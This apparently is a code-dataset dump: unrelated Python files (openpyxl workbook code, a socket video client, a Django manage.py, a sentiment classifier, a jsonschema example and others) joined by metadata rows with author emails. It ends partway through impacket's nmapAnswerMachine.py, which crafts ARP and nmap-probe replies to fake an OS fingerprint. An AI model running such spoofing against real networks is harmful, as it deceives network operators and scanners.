        self.add_named_style(NamedStyle(font=copy(DEFAULT_FONT), builtinId=0))
        self._table_styles = TableStyleList()
        self._differential_styles = DifferentialStyleList()

    @property
    def read_only(self):
        return self._read_only

    @property
    def data_only(self):
        return self._data_only

    @property
    def write_only(self):
        return self.__write_only

    @property
    def guess_types(self):
        return getattr(self, '__guess_types', False)

    @guess_types.setter
    def guess_types(self, value):
        self.__guess_types = value

    @deprecated("Use the .active property")
    def get_active_sheet(self):
        """Returns the current active sheet."""
        return self.active

    @property
    def excel_base_date(self):
        return self.epoch

    @property
    def active(self):
        """Get the currently active sheet or None

        :type: :class:`openpyxl.worksheet.worksheet.Worksheet`
        """
        try:
            return self._sheets[self._active_sheet_index]
        except IndexError:
            pass

    @active.setter
    def active(self, value):
        """Set the active sheet"""
        if not isinstance(value, (_WorkbookChild, INTEGER_TYPES)):
            raise TypeError("Value must be either a worksheet, chartsheet or numerical index")
        if isinstance(value, INTEGER_TYPES):
            # Numerical indices are accepted as-is (not range-checked).
            self._active_sheet_index = value
            return
            #if self._sheets and 0 <= value < len(self._sheets):
                #value = self._sheets[value]
            #else:
                #raise ValueError("Sheet index is outside the range of possible values", value)
        if value not in self._sheets:
            raise ValueError("Worksheet is not in the workbook")
        if value.sheet_state != "visible":
            raise ValueError("Only visible sheets can be made active")
        idx = self._sheets.index(value)
        self._active_sheet_index = idx

    def create_sheet(self, title=None, index=None):
        """Create a worksheet (at an optional index).

        :param title: optional title of the sheet
        :type title: unicode
        :param index: optional position at which the sheet will be inserted
        :type index: int

        """
        if self.read_only:
            raise ReadOnlyWorkbookException('Cannot create new sheet in a read-only workbook')

        if self.write_only :
            new_ws = WriteOnlyWorksheet(parent=self, title=title)
        else:
            new_ws = Worksheet(parent=self, title=title)

        self._add_sheet(sheet=new_ws, index=index)
        return new_ws

    def _add_sheet(self, sheet, index=None):
        """Add an worksheet (at an optional index)."""

        if not isinstance(sheet, (Worksheet, WriteOnlyWorksheet, Chartsheet)):
            raise TypeError("Cannot be added to a workbook")

        if sheet.parent != self:
            raise ValueError("You cannot add worksheets from another workbook.")

        if index is None:
            self._sheets.append(sheet)
        else:
            self._sheets.insert(index, sheet)

    def remove(self, worksheet):
        """Remove `worksheet` from this workbook."""
        idx = self._sheets.index(worksheet)
        # Delete any defined names scoped to the removed sheet first.
        localnames = self.defined_names.localnames(scope=idx)
        for name in localnames:
            self.defined_names.delete(name, scope=idx)
        self._sheets.remove(worksheet)

    @deprecated("Use wb.remove(worksheet) or del wb[sheetname]")
    def remove_sheet(self, worksheet):
        """Remove `worksheet` from this workbook."""
        self.remove(worksheet)

    def create_chartsheet(self, title=None, index=None):
        if self.read_only:
            raise ReadOnlyWorkbookException("Cannot create new sheet in a read-only workbook")
        cs = Chartsheet(parent=self, title=title)

        self._add_sheet(cs, index)
        return cs

    @deprecated("Use wb[sheetname]")
    def get_sheet_by_name(self, name):
        """Returns a worksheet by its name.

        :param name: the name of the worksheet to look for
        :type name: string

        """
        return self[name]

    def __contains__(self, key):
        # Membership is tested against sheet titles, not sheet objects.
        return key in set(self.sheetnames)

    def index(self, worksheet):
        """Return the index of a worksheet."""
        return self.worksheets.index(worksheet)

    @deprecated("Use wb.index(worksheet)")
    def get_index(self, worksheet):
        """Return the index of the worksheet."""
        return self.index(worksheet)

    def __getitem__(self, key):
        """Returns a worksheet by its name.

        :param name: the name of the worksheet to look for
        :type name: string

        """
        for sheet in self.worksheets + self.chartsheets:
            if sheet.title == key:
                return sheet
        raise KeyError("Worksheet {0} does not exist.".format(key))

    def __delitem__(self, key):
        # `del wb[name]` delegates to remove(), including defined-name cleanup.
        sheet = self[key]
        self.remove(sheet)

    def __iter__(self):
        # Iterating a workbook yields worksheets only (not chartsheets).
        return iter(self.worksheets)

    @deprecated("Use wb.sheetnames")
    def get_sheet_names(self):
        return self.sheetnames

    @property
    def worksheets(self):
        """A list of sheets in this workbook

        :type: list of :class:`openpyxl.worksheet.worksheet.Worksheet`
        """
        return [s for s in self._sheets if isinstance(s, (Worksheet, ReadOnlyWorksheet, WriteOnlyWorksheet))]

    @property
    def chartsheets(self):
        """A list of Chartsheets in this workbook

        :type: list of :class:`openpyxl.chartsheet.chartsheet.Chartsheet`
        """
        return [s for s in self._sheets if isinstance(s, Chartsheet)]

    @property
    def sheetnames(self):
        """Returns the list of the names of worksheets in this workbook.

        Names are returned in the worksheets order.

        :type: list of strings

        """
        return [s.title for s in self._sheets]

    def create_named_range(self, name, worksheet=None, value=None, scope=None):
        """Create a new named_range on a worksheet"""
        defn = DefinedName(name=name, localSheetId=scope)
        if worksheet is not None:
            defn.value = "{0}!{1}".format(quote_sheetname(worksheet.title), value)
        else:
            defn.value = value

        self.defined_names.append(defn)

    def add_named_style(self, style):
        """
        Add a named style
        """
        self._named_styles.append(style)
        style.bind(self)

    @property
    def named_styles(self):
        """
        List available named styles
        """
        return self._named_styles.names

    @deprecated("Use workbook.defined_names.definedName")
    def get_named_ranges(self):
        """Return all named ranges"""
        return self.defined_names.definedName

    @deprecated("Use workbook.defined_names.append")
    def add_named_range(self, named_range):
        """Add an existing named_range to the list of named_ranges."""
        self.defined_names.append(named_range)

    @deprecated("Use workbook.defined_names[name]")
    def get_named_range(self, name):
        """Return the range specified by name."""
        return self.defined_names[name]

    @deprecated("Use del workbook.defined_names[name]")
    def remove_named_range(self, named_range):
        """Remove a named_range from this workbook."""
        del self.defined_names[named_range]

    @property
    def mime_type(self):
        """
        The mime type is determined by whether a workbook is a template or
        not and whether it contains macros or not. Excel requires the file
        extension to match but openpyxl does not enforce this.

        """
        ct = self.template and XLTX or XLSX
        if self.vba_archive:
            ct = self.template and XLTM or XLSM
        return ct

    def save(self, filename):
        """Save the current workbook under the given `filename`.
        Use this function instead of using an `ExcelWriter`.

        .. warning::
            When creating your workbook using `write_only` set to True,
            you will only be able to call this function once. Subsequents attempts to
            modify or save the file will raise an :class:`openpyxl.shared.exc.WorkbookAlreadySaved` exception.
        """
        if self.read_only:
            raise TypeError("""Workbook is read-only""")
        if self.write_only and not self.worksheets:
            self.create_sheet()
        save_workbook(self, filename)

    @property
    def style_names(self):
        """
        List of named styles
        """
        return [s.name for s in self._named_styles]

    def copy_worksheet(self, from_worksheet):
        """Copy an existing worksheet in the current workbook

        .. warning::
            This function cannot copy worksheets between workbooks.
            worksheets can only be copied within the workbook that they belong

        :param from_worksheet: the worksheet to be copied from
        :return: copy of the initial worksheet
        """
        if self.__write_only or self._read_only:
            raise ValueError("Cannot copy worksheets in read-only or write-only mode")

        new_title = u"{0} Copy".format(from_worksheet.title)
        to_worksheet = self.create_sheet(title=new_title)
        cp = WorksheetCopy(source_worksheet=from_worksheet, target_worksheet=to_worksheet)
        cp.copy_worksheet()
        return to_worksheet

    def close(self):
        """
        Close workbook file if open. Only affects read-only and write-only modes.
        """
        if hasattr(self, '_archive'):
            self._archive.close()
| [
"slashsdull@gmail.com"
] | slashsdull@gmail.com |
6f9b54e564353b153d9722ad704799455a77f0b0 | 578e8f18c12e425f7a17210fb3c324ef1fac61c1 | /video_ex/streaming/video-client.py | e26013024013d5141e772ca25fa6e1696521f2eb | [] | no_license | jeonghaejun/09.RaspberryPi | 06c513add59d34e34a340f10cffa7a5aca075bd2 | 7a9145d985b5bfd227cc5bb90e5a2ac280292550 | refs/heads/master | 2023-03-24T23:15:57.693146 | 2021-03-19T08:56:08 | 2021-03-19T08:56:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | from video import Video
from time import sleep
import socket
import json
import net
HOST = '127.0.0.1'
PORT = 5000
if __name__ == '__main__':
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((HOST, PORT))
writer = s.makefile('wb')
reader = s.makefile('rb')
with Video(device=0) as v:
for image in v:
image = Video.to_jpg(image, 60)
print('video send ', len(image))
net.send(writer, image)
result = net.receive(reader)[0]
print(json.loads(result.decode()))
| [
"wjdgownsll@gmail.com"
] | wjdgownsll@gmail.com |
317e5b0993195cab701b749f5687da23f96ed43f | d79493f0f9b2664a597e6a2909516d2a582b3389 | /smote.py | a25ec68c13b417285fe0f30fba16fbb75143194d | [] | no_license | vivekaxl/Enigma | 8594c6efdd6ca7b5081bdd43772a17a426bb61bf | d4e9ae627c027181881b2b3369dd502c40254921 | refs/heads/master | 2020-05-18T06:16:31.093635 | 2015-02-05T16:24:20 | 2015-02-05T16:24:20 | 30,219,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,371 | py | # from os import environ, getcwd
# import sys
# from scipy.spatial.distance import euclidean
# # Update PYTHONPATH
# HOME = environ['HOME']
# axe = HOME + '/git/axe/axe/' # AXE
# pystat = HOME + '/git/pystats/' # PySTAT
# cwd = getcwd() # Current Directory
# sys.path.extend([axe, pystat, cwd])
# from random import choice, seed, uniform as rand
# import pandas as pd
# from dectree import *
# def SMOTE(data = None, k = 5, atleast = 50, atmost = 100):
# def Bugs(tbl):
# cells = [i.cells[-2] for i in tbl._rows]
# return cells
# def minority(data):
# unique = list(set(sorted(Bugs(data))))
# counts = len(unique) * [0];
# # set_trace()
# for n in xrange(len(unique)):
# for d in Bugs(data):
# if unique[n] == d: counts[n] += 1
# return unique, counts
# def knn(one, two):
# pdistVect = []
# # set_trace()
# for ind, n in enumerate(two):
# pdistVect.append([ind, euclidean(one.cells[:-1], n.cells[:-1])])
# indices = sorted(pdistVect, key = lambda F:F[1])
# return [two[n[0]] for n in indices]
# def extrapolate(one, two):
# new = one;
# # set_trace()
# new.cells[3:-1] = [min(a, b) + rand() * (abs(a - b)) for
# a, b in zip(one.cells[3:-1], two.cells[3:-1])]
# new.cells[-2] = int(new.cells[-2])
# return new
# def populate(data):
# newData = []
# reps = len(data) - atleast
# for _ in xrange(reps):
# for one in data:
# neigh = knn(one, data)[1:k + 1];
# two = choice(neigh)
# newData.append(extrapolate(one, two))
# data.extend(newData)
# return data
# def depopulate(data):
# return [choice(data) for _ in xrange(atmost)]
# newCells = []
# seed(1)
# unique, counts = minority(data)
# rows = data._rows
# for u, n in zip(unique, counts):
# if 1 < n < atleast:
# newCells.extend(populate([r for r in rows if r.cells[-2] == u]))
# elif n > atmost:
# newCells.extend(depopulate([r for r in rows if r.cells[-2] == u]))
# else:
# newCells.extend([r for r in rows if r.cells[-2] == u])
# return clone(data, rows = [k.cells for k in newCells])
# def test_smote():
# dir = '../Data/camel/camel-1.6.csv'
# Tbl = createTbl([dir])
# newTbl = SMOTE(data = Tbl)
# for r in newTbl._rows:
# print r.cells
# if __name__ == '__main__':
# test_smote() | [
"vivekaxl@gmail.com"
] | vivekaxl@gmail.com |
44db71a127fe964df4f92057b9d7472fb80b7ad3 | 48a555658d4a3b26f4b69211d047103ad82bb93c | /manage.py | 30208a5f2a8b773b2b799de2a074952435fc6267 | [] | no_license | blocknodes/roomreserver | 56d2d91dfaed3841218fa27e050440dd55f2afbb | bf926c3a8bc5c3283599ba088ad0cfd667855973 | refs/heads/main | 2023-06-14T13:04:18.663605 | 2021-07-05T09:02:32 | 2021-07-05T09:02:32 | 383,076,421 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'roomreserver.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"you@example.com"
] | you@example.com |
f824fb4fc38a34d6258a36c61bb44234d657c45d | 9a05e1e8c950b091124d805ea70f24d2837b827c | /daydayup/cema_python/eight/requestdemo4.py | 618e089e2210c839c52184cb85beb8e835dad219 | [] | no_license | fanzongpeng/mywork | 20676a9fe0e0599461a756ad194e4bd35aad4668 | aa6d044bbab3c0288de48888b2cc7dbd7785c91b | refs/heads/master | 2022-05-31T06:03:26.826914 | 2020-04-30T09:50:22 | 2020-04-30T09:50:22 | 257,189,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,011 | py | import json
dict = {
'message': 'success',
'url': '',
'data': {
'address': '北京',
'eid': 1,
'name': '这是一个测试',
'limit': 2000,
'start_time': '2019-05-31T15:25:19',
'status': True
},
'status': 200
}
# json = json.dumps(dict)
# print(json)
schema = {
"definitions": {},
"$schema": "http://json-schema.org/draft-07/schema#",
"$id": "http://example.com/root.json",
"type": "object",
"title": "The Root Schema",
"required": [
"message",
"url",
"data",
"status"
],
"properties": {
"message": {
"$id": "#/properties/message",
"type": "string",
"title": "The Message Schema",
"enum": ["success", "error"],
"pattern": "^(.*)$"
},
"url": {
"$id": "#/properties/url",
"type": "string",
"title": "The url",
"format": "uri",
},
"data": {
"$id": "#/properties/data",
"type": "object",
"title": "The Data Schema",
"required": [
"address",
"eid",
"name",
"limit",
"start_time",
"status"
],
"properties": {
"address": {
"$id": "#/properties/data/properties/address",
"type": "string",
"title": "The Address Schema",
"default": "",
"examples": [
"成都"
],
"pattern": "^(.*)$"
},
"eid": {
"$id": "#/properties/data/properties/eid",
"type": "integer",
"title": "The Eid Schema",
"default": 0,
"examples": [
1
]
},
"name": {
"$id": "#/properties/data/properties/name",
"type": "string",
"title": "The Name Schema",
"default": "",
"examples": [
"这是也是汉字"
],
"pattern": "^(.*)$"
},
"limit": {
"$id": "#/properties/data/properties/limit",
"type": "integer",
"title": "The Limit Schema",
"default": 0,
"examples": [
2000
]
},
"start_time": {
"$id": "#/properties/data/properties/start_time",
"type": "string",
"title": "The Start_time Schema",
"default": "",
"format": "date-time",
"examples": [
"2017-11-21T15:25:19"
],
"pattern": "^(.*)$"
},
"status": {
"$id": "#/properties/data/properties/status",
"type": "boolean",
"title": "The Status Schema",
"default": False,
"examples": [
True
]
}
}
},
"status": {
"$id": "#/properties/status",
"type": "integer",
"title": "The Status Schema",
"default": 0,
"examples": [
200
]
}
}
}
from jsonschema.validators import Draft4Validator
data = dict
validator = Draft4Validator(schema)
validator.validate(data) | [
"18210023228.com"
] | 18210023228.com |
87421e86c5d1275f774023eab4e876ea28c4e92e | 33c2c804fd38483755093628c6b08f31c296bd9f | /nlp/sentiment_analysis/MNB_classifier.py | ffa14200cd31e7f289886d0a47a469b9c55b25d7 | [] | no_license | thefr33radical/projects | 1ec51e5ec2d8b4ff671d7aa9a6bb72f6292f9b52 | ec26e509b64c58c79facadaf6345ab77f8ae7bd7 | refs/heads/master | 2021-06-02T19:21:12.369653 | 2021-04-23T12:46:52 | 2021-04-23T12:46:52 | 135,284,488 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,675 | py | from sklearn.externals.joblib import Memory
from sklearn.datasets import load_svmlight_file
from sklearn.feature_extraction.text import CountVectorizer
from sklearn import metrics
import numpy as np
from sklearn.naive_bayes import MultinomialNB
import pandas as pd
import os
from sklearn.datasets import load_files
import glob
import sys
import re
import pickle
mem = Memory("/home/gowtham/drive/codes/racetrack/sentiment_analysis/aclImdb/mycache")
subset = load_files('/home/gowtham/drive/codes/racetrack/sentiment_analysis/aclImdb/train',shuffle='False',encoding='utf-8')
subset2=load_files('/home/gowtham/drive/codes/racetrack/sentiment_analysis/aclImdb/test',shuffle='False',encoding='utf-8')
for i in range(0,len(subset.data)):
f_name=subset.filenames[i]
temp=f_name.split("_")
temp2=temp[2].split(".")
subset.target[i]=int(temp2[0])
# print((subset.data[i]), subset.filenames[i],subset.target[i])
v=CountVectorizer()
X=v.fit_transform(subset.data)
#print(v.get_feature_names())
model=MultinomialNB()
model.fit(X,subset.target)
#print(v.vocabulary_)
for i in range(0,len(subset2.data)):
f_name=subset2.filenames[i]
temp=f_name.split("_")
temp2=temp[2].split(".")
subset2.target[i]=int(temp2[0])
# print((subset.data[i]), subset.filenames[i],subset.target[i])
filename=("model.sav")
pickle.dump(model,open(filename,"wb"))
#--------------------------Testing-------------------------------------------------------
X2=v.transform(subset2.data)
expected=subset2.target
predicted=model.predict(X2)
c=pd.DataFrame({'test_data':subset2.data,'actual_value':subset2.target,'predicted':predicted})
c.to_csv("output.csv")
l=['this is very good.',
'this is bad.',
'this is very bad.',
'this is not good.',
'this is not what i had expected.',
'you are taking too much time.',
'this is good',
'this is awesome',
'this is slighly good',
'i expected better than this',
'this is much more than my expectation',
'this is something i love',
'this is something i hate',
'you are taking a hell lot of time.']
X3=v.transform(l)
predicted2=model.predict(X3)
c2=pd.DataFrame({'test_data':l,'predicted':predicted2})
c2.to_csv("output2.csv")
report=(metrics.classification_report(expected, predicted))
con_matrix=(metrics.confusion_matrix(expected, predicted))
print(report,con_matrix)
#with open("report.txt","w+") as f:
# f.write(report)
# f.write(con_matrix)
| [
"imperial.gauntlet@gmail.com"
] | imperial.gauntlet@gmail.com |
d048808d665f0b2335b0686f1f4c78264ffa56f2 | 81407be1385564308db7193634a2bb050b4f822e | /the-python-standard-library-by-example/ConfigParser/ConfigParser_allow_no_value.py | df8d6ea50bcdf1b9e1f5e8c326f47e315b219efe | [
"MIT"
] | permissive | gottaegbert/penter | 6db4f7d82c143af1209b4259ba32145aba7d6bd3 | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | refs/heads/master | 2022-12-30T14:51:45.132819 | 2020-10-09T05:33:23 | 2020-10-09T05:33:23 | 305,266,398 | 0 | 0 | MIT | 2020-10-19T04:56:02 | 2020-10-19T04:53:05 | null | UTF-8 | Python | false | false | 771 | py | #!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2010 Doug Hellmann. All rights reserved.
#
"""Reading a configuration file.
"""
#end_pymotw_header
import ConfigParser
# Require values
try:
parser = ConfigParser.SafeConfigParser()
parser.read('allow_no_value.ini')
except ConfigParser.ParsingError, err:
print 'Could not parse:', err
# Allow stand-alone option names
print '\nTrying again with allow_no_value=True'
parser = ConfigParser.SafeConfigParser(allow_no_value=True)
parser.read('allow_no_value.ini')
for flag in [ 'turn_feature_on', 'turn_other_feature_on' ]:
print
print flag
exists = parser.has_option('flags', flag)
print ' has_option:', exists
if exists:
print ' get:', parser.get('flags', flag)
| [
"350840291@qq.com"
] | 350840291@qq.com |
e67cd7a58f5a860c679aa449643fff683cf93bf0 | 9b8ca63a377e6f94cc6a970cc97a6f7f50932811 | /sale_analysis_report/__openerp__.py | 1aff230cf327cf05e60e952bcf9687f43b84d1a5 | [
"Apache-2.0"
] | permissive | lester-lees/extra_addons_sz | 9b6d2400abe4707b7b18d9e2e9caf2fb366cf3a6 | cddaf972cf4ea64c553bcff0006eb006a115d5ee | refs/heads/master | 2021-01-06T20:43:28.782147 | 2017-08-07T06:51:45 | 2017-08-07T06:51:45 | 99,545,991 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | # -*- coding: utf-8 -*-
{
"name": "Sale Analysis Report",
"description": """
""",
"version": "0.1",
"depends": ["base", "sale", "report_webkit"],
"category": "Reporting",
"author": "Jimmy Lee",
"url": "http://www.loewie.com/",
"update_xml": ["sale_report_view.xml","loewie_purchase_report.xml"],
"installable": True,
"auto_install": False,
} | [
"346994202@qq.com"
] | 346994202@qq.com |
c04b4864c9cd61b5cc428fd8e54f48ad6750ccef | e8d4fe2361d71aef6519f666152f14137156159c | /impacket-0.9.11/examples/nmapAnswerMachine.py | eaf2067e4a5a288294264361fc4f09eca167fb4c | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"Apache-1.1",
"BSD-2-Clause"
] | permissive | kenzshi/DDoSProject | 11d7e676a150964a9f78f1b7e1df4468dd9d973f | 9587a2be7f4773d19a96a35d1128f5041f0472da | refs/heads/master | 2021-01-10T19:48:21.355849 | 2015-03-16T09:52:22 | 2015-03-16T09:52:22 | 30,205,639 | 42 | 32 | null | null | null | null | UTF-8 | Python | false | false | 36,339 | py | import random
import os_ident
import uncrc32
try: import pcap as pcapy
except: import pcapy
from impacket import ImpactPacket
from impacket import ImpactDecoder
from impacket.ImpactPacket import TCPOption
#defaults
# Identity the emulated host presents on the wire.
MAC = "01:02:03:04:05:06"
IP = "192.168.67.254"
IFACE = "eth0"
# Ports that answer as open; any other probed port answers as closed.
OPEN_TCP_PORTS = [80, 443]
OPEN_UDP_PORTS = [111]
# Out-of-band control channel served by UDPCommandResponder
# (accepts 'cmd:who' and 'cmd:exit' datagrams).
UDP_CMD_PORT = 12345
# nmap OS signature database; the emulated fingerprint is loaded from here.
nmapOSDB = '/usr/share/nmap/nmap-os-db'

# Candidate signatures to emulate (exactly one active assignment).  The
# trailing notes record the nmap test values each signature exercises.
# Fingerprint = 'Adtran NetVanta 3200 router' # CD=Z TOSI=Z <----------- NMAP detects it as Linux!!!
# Fingerprint = 'ADIC Scalar 1000 tape library remote management unit' # DFI=S
# Fingerprint = 'Siemens Gigaset SX541 or USRobotics USR9111 wireless DSL modem' # DFI=O U1(DF=N IPL=38)
# Fingerprint = 'Apple Mac OS X 10.5.6 (Leopard) (Darwin 9.6.0)' # DFI=Y SI=S U1(DF=Y)
Fingerprint = 'Sun Solaris 10 (SPARC)'
# Fingerprint = 'Sun Solaris 9 (x86)'

# Fingerprint = '3Com OfficeConnect 3CRWER100-75 wireless broadband router' # TI=Z DFI=N !SS TI=Z II=I
# Fingerprint = 'WatchGuard Firebox X5w firewall/WAP' # TI=RD
# no TI=Hex
# Fingerprint = 'FreeBSD 6.0-STABLE - 6.2-RELEASE' # TI=RI
# Fingerprint = 'Microsoft Windows 98 SE' # TI=BI ----> BROKEN! nmap shows no SEQ() output
# Fingerprint = 'Microsoft Windows NT 4.0 SP5 - SP6' # TI=BI TOSI=S SS=S
# Fingerprint = 'Microsoft Windows Vista Business' # TI=I U1(IPL=164)
# Fingerprint = 'FreeBSD 6.1-RELEASE' # no TI (TI=O)
# Fingerprint = '2Wire 1701HG wireless ADSL modem' # IE(R=N)
# Fingerprint = 'Cisco Catalyst 1912 switch' # TOSI=O SS=S

# Indexes of the decoded protocol layers inside an "onion" (the list of
# packet layers a sniffed frame decodes into).  Alternative layers at the
# same depth share an index (IP/ARP at 1; UDP/TCP/ICMP at 2).
O_ETH = 0
O_IP = 1
O_ARP = 1
O_UDP = 2
O_TCP = 2
O_ICMP = 2
O_UDP_DATA = 3
O_ICMP_DATA = 3
def string2tuple(string):
    """Parse a ':'- or '.'-separated address string into a list of ints.

    Handles both MAC-style ("1:2:3:4:5:6") and IPv4-style ("192.168.0.1")
    notation; the presence of a ':' selects the separator.  Each component
    is parsed as a decimal integer.  Despite the name, a list is returned,
    which is what the ImpactPacket address setters accept.
    """
    # Idiomatic membership test instead of find() >= 0, and a single
    # comprehension instead of two duplicated ones.
    separator = ':' if ':' in string else '.'
    return [int(component) for component in string.split(separator)]
class Responder:
    """Base class for all probe responders.

    A responder decides whether a sniffed packet (an "onion": the list of
    decoded protocol layers, indexed with the O_* constants) is the probe
    it emulates an answer for, and if so builds and sends the reply.

    Subclasses parameterize behaviour with two class attributes:
      templateClass -- os_ident probe class used to build a reference
                       packet that incoming probes are matched against
                       (None: matching is decided purely by isMine()).
      signatureName -- name of the nmap-os-db test line (e.g. 'T1', 'IE')
                       whose values drive the crafted answer (None: no
                       fingerprint data is needed).
    """
    templateClass = None
    signatureName = None

    def __init__(self, machine):
        # machine is the Machine instance holding shared state (IP/MAC,
        # open ports, IP ID / TCP sequence generators, send interface).
        self.machine = machine
        print "Initializing %s" % self.__class__.__name__
        self.initTemplate()
        self.initFingerprint()

    def initTemplate(self):
        """Instantiate the reference probe and peel it into a layer list."""
        if not self.templateClass:
            self.template_onion = None
        else:
            try:
                # Some probe classes take an extra (sport, dport) pair...
                probe = self.templateClass(0, ['0.0.0.0',self.getIP()],[0, 0])
            except:
                # ...others accept only the address pair.
                probe = self.templateClass(0, ['0.0.0.0',self.getIP()])
            self.template_onion = [probe.get_packet()]
            try:
                # Walk down the protocol stack until child() fails.
                while 1: self.template_onion.append(self.template_onion[-1].child())
            except: pass
            # print "Template: %s" % self.template_onion[O_ETH]
            # print "Options: %r" % self.template_onion[O_TCP].get_padded_options()
            # print "Flags: 0x%04x" % self.template_onion[O_TCP].get_th_flags()

    def initFingerprint(self):
        """Copy this responder's test line out of the emulated fingerprint."""
        if not self.signatureName:
            self.fingerprint = None
        else:
            self.fingerprint = self.machine.fingerprint.get_tests()[self.signatureName].copy()

    def isMine(self, in_onion):
        # Overridden by subclasses; the base class matches nothing.
        return False

    def buildAnswer(self, in_onion):
        # Overridden by subclasses; returning None means "do not reply".
        return None

    def sendAnswer(self, out_onion):
        self.machine.sendPacket(out_onion)

    def process(self, in_onion):
        """Handle one sniffed packet; return True when it was consumed."""
        if not self.isMine(in_onion): return False
        print "Got packet for %s" % self.__class__.__name__

        out_onion = self.buildAnswer(in_onion)

        if out_onion: self.sendAnswer(out_onion)
        return True

    def getIP(self):
        return self.machine.ipAddress
# Generic Responders (does the word Responder exist?)
class ARPResponder(Responder):
    """Answers ARP who-has requests for the emulated IP address."""

    def isMine(self, in_onion):
        # Need at least an Ethernet layer plus an ARP layer.
        if len(in_onion) < 2:
            return False
        request = in_onion[O_ARP]
        if request.ethertype != ImpactPacket.ARP.ethertype:
            return False
        if request.get_ar_op() != 1:        # only ARP REQUESTs
            return False
        return request.get_ar_tpa() == string2tuple(self.machine.ipAddress)

    def buildAnswer(self, in_onion):
        request = in_onion[O_ARP]

        reply = ImpactPacket.ARP()
        reply.set_ar_hrd(1)                 # hardware type: Ethernet
        reply.set_ar_pro(0x800)             # protocol type: IP
        reply.set_ar_op(2)                  # opcode: REPLY
        reply.set_ar_hln(6)                 # hardware address length
        reply.set_ar_pln(4)                 # protocol address length
        reply.set_ar_sha(string2tuple(self.machine.macAddress))
        reply.set_ar_spa(string2tuple(self.machine.ipAddress))
        reply.set_ar_tha(request.get_ar_sha())
        reply.set_ar_tpa(request.get_ar_spa())

        frame = ImpactPacket.Ethernet()
        frame.contains(reply)
        frame.set_ether_shost(reply.get_ar_sha())
        frame.set_ether_dhost(reply.get_ar_tha())
        return [frame, reply]
class IPResponder(Responder):
    """Base for responders to IP-carried probes.

    Provides the common Ethernet+IP reply skeleton (addresses swapped,
    fresh IP ID) and the matching helpers shared by the TCP/UDP/ICMP
    responders.
    """

    def buildAnswer(self, in_onion):
        """Return an [Ethernet, IP] onion addressed back at the prober."""
        eth = ImpactPacket.Ethernet()
        ip = ImpactPacket.IP()

        eth.contains(ip)
        # Swap source and destination at both link and network layer.
        eth.set_ether_shost(in_onion[O_ETH].get_ether_dhost())
        eth.set_ether_dhost(in_onion[O_ETH].get_ether_shost())

        ip.set_ip_src(in_onion[O_IP].get_ip_dst())
        ip.set_ip_dst(in_onion[O_IP].get_ip_src())
        # IP ID comes from the machine-wide generator.
        ip.set_ip_id(self.machine.getIPID())
        return [eth, ip]

    def sameIPFlags(self, in_onion):
        # Compare only the top three bits of the fragment field (the IP
        # flags) against the template probe.
        if not self.template_onion: return True
        return (self.template_onion[O_IP].get_ip_off() & 0xe000) == (in_onion[O_IP].get_ip_off() & 0xe000)

    def isMine(self, in_onion):
        # An IP packet addressed to the emulated host, with the same IP
        # flags as this responder's template probe.
        if len(in_onion) < 2: return False
        return (
            (in_onion[O_IP].ethertype == ImpactPacket.IP.ethertype) and
            (in_onion[O_IP].get_ip_dst() == self.machine.ipAddress) and
            self.sameIPFlags(in_onion)
        )

    def setTTLFromFingerprint(self, out_onion):
        """Set the answer's initial TTL from the fingerprint's T/TG tests."""
        f = self.fingerprint
        # Test T: Initial TTL = range_low-range_hi, base 16
        # Assumption: we are using the minimum in the TTL range
        try:
            ttl = f['T'].split('-')
            ttl = int(ttl[0], 16)
        except:
            # Neither test present: fall back to a common default.
            ttl = 0x7f

        # Test TG: Initial TTL Guess. It's just a number, we prefer this
        try: ttl = int(f['TG'], 16)
        except: pass

        out_onion[O_IP].set_ip_ttl(ttl)
class ICMPResponder(IPResponder):
    """Base for ICMP echo responders.

    Matches incoming probes against this responder's template ICMP packet
    and builds the common ICMP echo-reply skeleton.
    """

    def buildAnswer(self, in_onion):
        out_onion = IPResponder.buildAnswer(self, in_onion)
        icmp = ImpactPacket.ICMP()

        out_onion[O_IP].contains(icmp)
        out_onion.append(icmp)

        # Echo replies keep the probe's identifier and sequence number.
        icmp.set_icmp_id(in_onion[O_ICMP].get_icmp_id())
        icmp.set_icmp_seq(in_onion[O_ICMP].get_icmp_seq())

        # ICMP answers use a separate IP ID generator, overriding the ID
        # set by IPResponder.buildAnswer().
        out_onion[O_IP].set_ip_id(self.machine.getIPID_ICMP())
        return out_onion

    def isMine(self, in_onion):
        if not IPResponder.isMine(self, in_onion): return False
        if len(in_onion) < 3: return False
        return (
            (in_onion[O_ICMP].protocol == ImpactPacket.ICMP.protocol) and
            self.sameICMPTemplate(in_onion))

    def sameICMPTemplate(self, in_onion):
        """True when TOS, DF, ICMP type/code and payload size all match the
        template probe (subclasses use different probe templates)."""
        t_ip = self.template_onion[O_IP]
        t_icmp = self.template_onion[O_ICMP]
        t_icmp_datalen = self.template_onion[O_ICMP_DATA].get_size()
        return (
            (t_ip.get_ip_tos() == in_onion[O_IP].get_ip_tos()) and
            (t_ip.get_ip_df() == in_onion[O_IP].get_ip_df()) and
            (t_icmp.get_icmp_type() == in_onion[O_ICMP].get_icmp_type()) and
            (t_icmp.get_icmp_code() == in_onion[O_ICMP].get_icmp_code()) and
            (t_icmp_datalen == in_onion[O_ICMP_DATA].get_size())
        )
class UDPResponder(IPResponder):
    """Common matcher for probes carried over UDP."""

    def isMine(self, in_onion):
        # IP-level checks first (destination address, fragment flags)...
        if not IPResponder.isMine(self, in_onion):
            return False
        # ...then require a third layer that actually is UDP.
        if len(in_onion) < 3:
            return False
